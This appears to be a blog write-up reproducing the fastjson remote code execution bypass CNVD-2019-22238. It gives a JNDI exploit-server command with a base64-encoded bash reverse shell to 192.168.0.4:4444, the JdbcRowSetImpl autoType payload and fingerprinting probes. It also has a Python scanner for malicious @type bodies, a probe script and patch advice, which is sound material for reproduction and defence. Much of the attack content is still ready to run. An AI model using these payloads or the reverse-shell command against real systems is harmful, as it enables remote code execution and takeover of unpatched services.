Fastjson remote code execution (CNVD-2019-22238) vulnerability reappears

0x00 Vulnerability Introduction

Fastjson is a Java library that can convert Java objects to JSON format, and of course it can also convert JSON strings to Java objects.

0x01 Vulnerability Details

Fastjson provides an autoType feature that lets the JSON document itself name the class to deserialize into, via the "@type" key. Fastjson's custom deserialization then calls the setter methods (and some getter methods) of that class. When a component deserializes untrusted data with autoType available, an attacker can craft the input so that the target application's control flow enters a chosen setter or getter of a chosen class. If that method contains logic that can be abused (what is commonly called a "gadget"), the result is a serious security risk, up to remote code execution.

The payload used in this write-up (CNVD-2019-22238, fixed in fastjson 1.2.48) works even when autoType is switched off. Deserializing a java.lang.Class object whose "val" names the gadget class makes fastjson load that class and cache it in its type mapping; a later "@type" that names the cached class is resolved from the cache and never reaches the autoType blacklist. The gadget is com.sun.rowset.JdbcRowSetImpl: setDataSourceName stores a JNDI name, and setAutoCommit(true) performs a JNDI lookup of it, which against an attacker-controlled LDAP server leads to remote class loading and code execution.

0x02 Affected versions

fastjson <= 1.2.47

0x03 Vulnerability reproduction

Environment preparation

JNDI (RMI/LDAP) server: provided by JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
Netcat: receives the reverse shell.
Both services can run on the same machine.

1. Start the vulnerable environment with vulhub.
2. Start an nc listener on the Kali attacker box (the payload below connects back to port 4444).

3. Start the JNDI server
The tool serves the Java payload that executes the command and prints the JNDI URLs (rmi:// and ldap://) to reference from the JSON.
Start it with:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.0.4"    # 192.168.0.4 is the IP of the JNDI server

-C is the command to run on the target, -A the address the JNDI server listens on. The base64 string decodes to bash -i >& /dev/tcp/192.168.0.4/4444 0>&1, a reverse shell to the nc listener from step 2.

4. Capture and modify the request in Burp
Change the request to POST and set Content-Type to application/json. If you copy the payload from a web page, make sure the quotation marks and colons are ASCII characters, not full-width punctuation.

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.0.4:1389/1q9qke",
        "autoCommit":true
    }
}

Put one of the JNDI URLs printed by the tool into dataSourceName and send the request. The tool prints several URLs (one per JDK version range); if one fails, try the others.
When the lookup succeeds the command runs on the target and the reverse shell connects back to nc.
reference: https://blog.csdn.net/qq_40007043/article/details/107615314
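The defensive counterpart of the payload above, as an added example (not code from the original write-up): a scanner for request bodies that walks decoded JSON, flags every "@type" key, and singles out the two patterns that make up this bypass, java.lang.Class with a "val" (type-cache pre-load) followed by the JdbcRowSetImpl gadget with a JNDI URL. The sample bodies are constructed here; the LDAP address is the one used in the reproduction above. Because fastjson decodes \u0040type to @type before matching, the scanner matches on decoded keys rather than raw bytes, and it falls back to a raw-text check for bodies a strict JSON parser rejects.

```python
from __future__ import annotations

import json
import re
from typing import Any, Iterator

# Classes whose appearance in an "@type" key marks the 1.2.47 bypass:
# java.lang.Class pre-loads the gadget into fastjson's type cache,
# JdbcRowSetImpl's setters end in a JNDI lookup.
CACHE_LOADER_CLASSES = {"java.lang.Class"}
JNDI_GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://")
# Fallback for bodies a strict parser rejects: fastjson tolerates syntax
# (single-quoted strings, for example) that json.loads does not.
RAW_TYPE_RE = re.compile(r"(?:@|\\u0040)type", re.IGNORECASE)


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (JSONPath-style location, value) for every node, depth first."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}[{index}]")


def find_autotype_indicators(body: str) -> list[str]:
    """Return human-readable findings for one request body; an empty list means clean."""
    try:
        doc = json.loads(body)
    except ValueError:
        # Not strict JSON: either the truncated fingerprint probe or
        # fastjson-only syntax. Flag any @type mention in the raw text.
        return ["raw body is not strict JSON but mentions @type"] if RAW_TYPE_RE.search(body) else []

    findings: list[str] = []
    for path, node in walk(doc):
        if not isinstance(node, dict):
            continue
        type_name = node.get("@type")
        if isinstance(type_name, str):
            if type_name in CACHE_LOADER_CLASSES and isinstance(node.get("val"), str):
                findings.append(f"{path}: @type {type_name} val={node['val']} (type-cache pre-load, 1.2.47 bypass)")
            elif type_name in JNDI_GADGET_CLASSES:
                findings.append(f"{path}: @type {type_name} (known JNDI gadget)")
            else:
                findings.append(f"{path}: @type {type_name} (autoType request)")
        for key, value in node.items():
            if isinstance(value, str) and value.lower().startswith(JNDI_SCHEMES):
                findings.append(f"{path}.{key}: JNDI URL {value}")
    return findings


# Constructed samples: the payload from this write-up and a benign body.
BYPASS_PAYLOAD = (
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://192.168.0.4:1389/1q9qke","autoCommit":true}}'
)
BENIGN_BODY = '{"user":"alice","tags":["a","b"],"profile":{"age":3}}'

if __name__ == "__main__":
    for sample in (BYPASS_PAYLOAD, BENIGN_BODY):
        print(sample[:40], "->", find_autotype_indicators(sample) or "clean")
```

Any "@type" at all is worth logging on an endpoint that never expects typed JSON; the two named patterns are the ones to alert on. The class lists are deliberately short and are assumptions for illustration, not a complete gadget inventory.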

0x05 Payloads

Payloads for other environments: https://mp.weixin.qq.com/s/I0OdFPnRH_r1yZ04tOB-cw

0x06 Fingerprinting

If the application echoes errors, deliberately send incomplete JSON and the response reports a parse error.
Leave out the closing brace at the end of the body so the document is incomplete; the error in the returned response names fastjson (the exception class is com.alibaba.fastjson.JSONException).
If errors are not echoed, use a DNSLog domain instead. Fastjson resolves the val of a java.net.Inet4Address while deserializing it, so a DNS query for the domain arriving at the collector confirms that fastjson parsed the input.
{"zeo":{"@type":"java.net.Inet4Address", "val":"p6ddoz.dnslog.cn"}}
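The two-stage fingerprint above as a small script, added here as an example and not part of the original write-up. The transport is pluggable so the flow runs offline: http_post builds a real sender for a target URL (an assumed parameter), while the two "targets" at the bottom are constructed responses that stand in for a chatty and a silent application. The DNSLog domain is also an assumption.

```python
from __future__ import annotations

import json
import urllib.error
import urllib.request
from typing import Callable

# Probe 1: a deliberately truncated document (closing brace missing). A
# fastjson parser that echoes exceptions returns a message naming
# com.alibaba.fastjson.JSONException.
BROKEN_JSON_PROBE = '{"a":"b"'


def dns_probe(domain: str) -> str:
    """Probe 2: fastjson resolves the val of a java.net.Inet4Address while
    deserializing it, so a lookup for `domain` on a DNSLog-style collector
    confirms fastjson even when nothing is echoed."""
    return json.dumps({"zeo": {"@type": "java.net.Inet4Address", "val": domain}})


def error_echo_names_fastjson(response_body: str) -> bool:
    return "fastjson" in response_body.lower()


def http_post(url: str, timeout: float = 5.0) -> Callable[[str], str]:
    """Build a sender for a real target: POST with Content-Type: application/json,
    returning the body even for 4xx/5xx responses (that is where the error echo lives)."""
    def post(body: str) -> str:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/json"},
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            return err.read().decode(errors="replace")
    return post


def fingerprint(post: Callable[[str], str], dns_domain: str) -> str:
    """Run the two-stage check. Returns 'error-echo' when the error message
    names fastjson, otherwise 'dns-probe-sent' (then check the DNS collector)."""
    if error_echo_names_fastjson(post(BROKEN_JSON_PROBE)):
        return "error-echo"
    post(dns_probe(dns_domain))
    return "dns-probe-sent"


# Constructed responses standing in for real targets so the flow runs offline.
def chatty_target(body: str) -> str:
    if not body.endswith("}"):
        return "com.alibaba.fastjson.JSONException: syntax error, pos 8"
    return '{"ok":true}'


def silent_target(body: str) -> str:
    return '{"error":"bad request"}'


if __name__ == "__main__":
    print(fingerprint(chatty_target, "x.dnslog.example"))   # error-echo
    print(fingerprint(silent_target, "x.dnslog.example"))   # dns-probe-sent
```

Against a live target, pass http_post("http://target/endpoint") as the sender and watch the DNSLog panel after a dns-probe-sent result; the DNS stage gives no in-band answer by design.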

0x07 Precautions

When copying payload text, make sure the punctuation is ASCII rather than full-width Chinese characters.
In the Burp Suite request, set Content-Type to application/json.

0x08 Fix

Upgrade to the latest official release. This bypass was closed in fastjson 1.2.48. From 1.2.68 onward, safeMode (ParserConfig.getGlobalInstance().setSafeMode(true), or the -Dfastjson.parser.safeMode=true JVM property) disables autoType entirely, which is the right setting for any service that does not need "@type" in its input.

Origin blog.csdn.net/weixin_54430466/article/details/122255449